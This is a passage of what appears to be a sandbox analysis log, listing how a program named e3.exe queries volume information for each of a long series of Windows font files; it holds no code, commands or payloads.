                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
